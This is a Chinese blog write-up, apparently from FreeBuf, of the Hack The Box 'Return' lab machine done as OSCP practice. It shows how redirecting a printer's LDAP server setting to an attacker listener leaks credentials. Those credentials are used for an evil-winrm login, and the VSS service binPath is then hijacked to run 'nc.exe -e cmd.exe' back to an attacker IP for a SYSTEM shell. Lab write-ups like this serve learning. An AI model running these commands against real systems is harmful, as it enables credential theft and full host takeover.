OSCP靶场106--Return(HTB)
文章描述了攻击链配置界面泄露的过程:通过抓包改字段获取凭据,利用打印机服务账户权限修改系统服务以获得高权限反弹shell。过程中涉及打印机存储的SMB、LDAP凭据及配置页面发送攻击机IP监听凭据的方法。 2025-12-19 02:33:33 Author: www.freebuf.com(查看原文) 阅读量:1 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

攻击链

配置界面泄露---抓包改字段,获得凭据---根据获得权限,修改系统以高权限用户运行的服务---中止&启动服务获得高权限反弹shell

知识点

打印机的服务账户

Server Operators本身的用户

过程

信息收集

1766041538_6943a7c2c21f404ed82e0.png!small?1766041536738

我枚举了所有端口没有找到有用的信息。

Initial Access

1766048406_6943c296b22a8d3d9aa82.png!small?1766048408143

我以为svc-printer的凭据更新后是有效的,结果各个端口尝试了一遍都不对。Password在更新之前其实是用所有 * 预填充的字段。

这时候一筹莫展了

所以出现了新的知识点:

打印机中存储着SMB、LDAP凭据,用于向AD查询用户列表,并能够将扫描的文件保存到用户驱动器。

配置页面可用于指定域控制器or文件服务器。

所以既然可以指定交互的服务器,那肯定要发送对应的凭据,配置页面没有发送,不等于该打印机没有发送。

那把Server Address改成我们的攻击机IP,同时监听端口看有无收到凭据。就监听389端口。

1766049640_6943c76885806d499418a.png!small?1766049641364

evil-winrm -i 10.129.95.241 -u svc-printer -p '1edFg43012!!'

1766049713_6943c7b1cf047d46b57aa.png!small?1766049714283

Privilege Escalation

1766110049_6944b3614a2a0e0950df5.png!small?1766110048785

AD的知识点太多,我不知道能不能学完,考试的时候会不会蹦出来新的知识点。

1766110323_6944b47390a0d4368c2b8.png!small?1766110323361

可以通过修改系统服务的二进制路径来获取反向shell。具体:劫持一个以高权限(Eg:System)运行的系统服务,执行的用处是弹回目标用户的shell。

上传nc,修改系统服务 "Volume Shadow Copy Service (vss)" 的配置,将其执行的程序路径指向我们上传的nc.exe,并附带连接参数。

upload nc.exe

sc.exe config vss binPath="C:\Users\svc-printer\Downloads\nc.exe -e cmd.exe 10.10.14.116 4445"

通过启动服务去触发反弹命令。

sc.exe stop vss
sc.exe start vss

1766111249_6944b811ad5b2e8bb6877.png!small?1766111249122

1766111262_6944b81e2301b4f02399b.png!small?1766111261541

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/system/462838.html
如有侵权请联系:admin#unsafe.sh